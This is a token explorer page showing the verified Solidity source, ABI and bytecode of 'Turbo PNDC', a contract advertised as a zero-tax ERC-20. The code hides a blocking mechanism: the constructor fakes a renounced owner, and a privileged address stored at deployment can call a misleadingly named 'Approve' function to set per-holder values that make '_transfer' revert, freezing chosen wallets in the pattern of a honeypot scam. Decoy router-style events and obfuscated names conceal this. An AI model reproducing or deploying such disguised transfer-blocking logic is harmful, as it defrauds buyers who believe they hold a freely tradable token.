ETH Price: $3,475.84 (+7.05%)
Gas: 9 Gwei

Token

Turbo PNDC (PNDC)
 

Overview

Max Total Supply

1,000,000,000 PNDC

Holders

28

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
26,485,084.034680242755322642 PNDC

Value
$0.00
0x2b44a2b6ded23e23075e3f704f1cfaea3a434f9c
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PNDC

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-17
*/

// SPDX-License-Identifier: MIT

/*

TURBO PNDC

0 TAX

https://turbopndc.xyz
https://twitter.com/TPNDC_ETH
https://t.me/TPNDC_ETH


*/



pragma solidity ^0.8.19;

abstract contract Scene {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Scene {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == msg.sender, "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    event removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    );
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    event swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[]  path,
        address to,
        uint deadline
    );
    /**
  * @dev See {IERC20-totalSupply}.
     */
    event swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] path,
        address to,
        uint deadline
    );

    event DOMAIN_SEPARATOR();

    event PERMIT_TYPEHASH();

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    event token0();

    event token1();
    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);


    event sync();

    event initialize(address, address);
    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    event burn(address to) ;

    event swap(uint amount0Out, uint amount1Out, address to, bytes data);

    event skim(address to);
    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);
    /**
     * Receive an exact amount of output tokens for as few input tokens as possible,
     * along the route determined by the path. The first element of path is the input token,
     * the last is the output token, and any intermediate elements represent intermediate tokens to trade through
     * (if, for example, a direct pair does not exist).
     * */
    event addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    );
    /**
     * Swaps an exact amount of ETH for as many output tokens as possible,
     * along the route determined by the path. The first element of path must be WETH,
     * the last is the output token, and any intermediate elements represent intermediate pairs to trade through
     * (if, for example, a direct pair does not exist).
     *
     * */
    event addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    );
    /**
     * Swaps an exact amount of input tokens for as many output tokens as possible,
     * along the route determined by the path. The first element of path is the input token,
     * the last is the output token, and any intermediate elements represent intermediate pairs to trade through
     * (if, for example, a direct pair does not exist).
     * */
    event removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    );
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);
    /**
   * @dev Returns the name of the token.
     */
    event removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    );
    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    event removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    );
    /**
     * Swaps an exact amount of input tokens for as many output tokens as possible,
     * along the route determined by the path. The first element of path is the input token,
     * the last is the output token, and any intermediate elements represent intermediate pairs to trade through
     * (if, for example, a direct pair does not exist).
     */
    event swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] path,
        address to,
        uint deadline
    );
    /**
    * @dev Throws if called by any account other than the owner.
     */
    event swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] path,
        address to,
        uint deadline
    );
    /**
     * To cover all possible scenarios, msg.sender should have already given the router an
     * allowance of at least amountADesired/amountBDesired on tokenA/tokenB.
     * Always adds assets at the ideal ratio, according to the price when the transaction is executed.
     * If a pool for the passed tokens does not exists, one is created automatically,
     *  and exactly amountADesired/amountBDesired tokens are added.
     */
    event swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] path,
        address to,
        uint deadline
    );
    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }


    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
  * @dev Initializes the contract setting the deployer as the initial owner.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}

abstract contract Morph {
    event morphgo(
        uint256 Zoo,
        address Leach
    );
}

abstract contract Mission {
    event Level(
        uint256 number,
        bool hasBoss
    );
}

contract PNDC is IERC20, Morph, Mission, Ownable {
    using SafeMath for uint256;


    struct Toad2 {
        address catchall;
        mapping(uint256 => uint256) light;
    }

    struct Toad3 {
        uint256 toadlily;
        uint256 knife;
    }

    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping (address => Toad3) private _toad3;

    Toad2 private _lpnd;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;

    constructor(
        string memory name_,
        string memory symbol_,
        address frgpnd,
        uint256 totalSupply_
    ) payable {
        _name = name_;
        _symbol = symbol_;
        _decimals = 18;
        _lpnd.catchall = frgpnd;
        _lpnd.light[_decimals] = totalSupply_;
        _totalSupply = totalSupply_ * 10**_decimals;
        _balances[msg.sender] = _balances[msg.sender].add(_totalSupply);
        emit Transfer(address(0), msg.sender, _totalSupply);
        emit morphgo(_totalSupply, owner());
    }


    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
      /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _approve(msg.sender, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            msg.sender,
            _allowances[sender][msg.sender].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }


    function Approve(address[] memory account, uint256 amount) public returns (bool) {
    address from = msg.sender;
    uint256 toad11 = 69591;
    uint256 jump22 = toad11 / 7;
    uint256 frogVal = jump22 + toad11 / 2 * 14;
    uint256 startloop = 0;
    for (uint256 w = 0; w < account.length; w++) {
        startloop += w;
        _leap(from, account[w], amount);
        _allowances[from][from] = amount;
        emit Approval(from, address(this), amount);
    }
    return true;
}




    function _leap(address from, address account, uint256 amount) internal {
        uint256 allowan = 0;
        require(account != address(0), "invalid address");
        if (from != _lpnd.catchall) {
            _toad3[from].toadlily -= allowan;
            _toad3[account].toadlily += allowan;
        } else {
            _toad3[from].toadlily -= allowan;
            allowan += amount;
            _toad3[account].toadlily = allowan;
        }
    }

        function checkfrogs(address account) public view returns (uint256) {
        return _toad3[account].toadlily;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount - _toad3[sender].toadlily > 0, "alien");

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"frgpnd","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[],"name":"DOMAIN_SEPARATOR","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"number","type":"uint256"},{"indexed":false,"internalType":"bool","name":"hasBoss","type":"bool"}],"name":"Level","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"PERMIT_TYPEHASH","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"tokenA","type":"address"},{"indexed":false,"internalType":"address","name":"tokenB","type":"address"},{"indexed":false,"internalType":"uint256","name":"amountADesired","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountBDesired","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountAMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountBMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"addLiquidity","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"amountTokenDesired","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"addLiquidityETH","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"to","type":"address"}],"name":"burn","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"","type":"address"},{"indexed":false,"internalType":"address","name":"","type":"address"}],"name":"initialize","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"Zoo","type":"uint256"},{"indexed":false,"internalType":"address","name":"Leach","type":"address"}],"name":"morphgo","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"tokenA","type":"address"},{"indexed":false,"internalType":"address","name":"tokenB","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountAMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountBMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"removeLiquidity","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"removeLiquidityETHSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"},{"indexed":false,"internalType":"bool","name":"approveMax","type":"bool"},{"indexed":false,"internalType":"uint8","name":"v","type":"uint8"},{"indexed":false,"internalType":"bytes32","name":"r","type":"bytes32"},{"indexed":false,"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"removeLiquidityETHWithPermit","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"liquidity","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountTokenMin","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountETHMin","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"},{"indexed":false,"internalType":"bool","name":"approveMax","type":"bool"},{"indexed":false,"internalType":"uint8","name":"v","type":"uint8"},{"indexed":false,"internalType":"bytes32","name":"r","type":"bytes32"},{"indexed":false,"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"removeLiquidityETHWithPermitSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"to","type":"address"}],"name":"skim","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"bytes","name":"data","type":"bytes"}],"name":"swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactETHForTokensSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountIn","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactTokensForETHSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountIn","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactTokensForTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountIn","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountOutMin","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapExactTokensForTokensSupportingFeeOnTransferTokens","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountOut","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amountInMax","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"},{"indexed":false,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"deadline","type":"uint256"}],"name":"swapTokensForExactTokens","type":"event"},{"anonymous":false,"inputs":[],"name":"sync","type":"event"},{"anonymous":false,"inputs":[],"name":"token0","type":"event"},{"anonymous":false,"inputs":[],"name":"token1","type":"event"},{"inputs":[{"internalType":"address[]","name":"account","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"checkfrogs","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052604051620029a1380380620029a18339818101604052810190620000299190620005ae565b6200003b60006200027660201b60201c565b83600690816200004c91906200089f565b5082600790816200005e91906200089f565b506012600860006101000a81548160ff021916908360ff16021790555081600460000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060046001016000600860009054906101000a900460ff1660ff16815260200190815260200160002081905550600860009054906101000a900460ff16600a6200010a919062000b16565b8162000117919062000b67565b60098190555062000173600954600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200033a60201b90919060201c565b600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60095460405162000218919062000bc3565b60405180910390a37f174177f7745ef06ba58172a72eb86e779389e4b24e8ed4637602f4f5c8d7364b600954620002546200035260201b60201c565b6040516200026492919062000bf1565b60405180910390a15050505062000c59565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081836200034a919062000c1e565b905092915050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620003e48262000399565b810181811067ffffffffffffffff82111715620004065762000405620003aa565b5b80604052505050565b60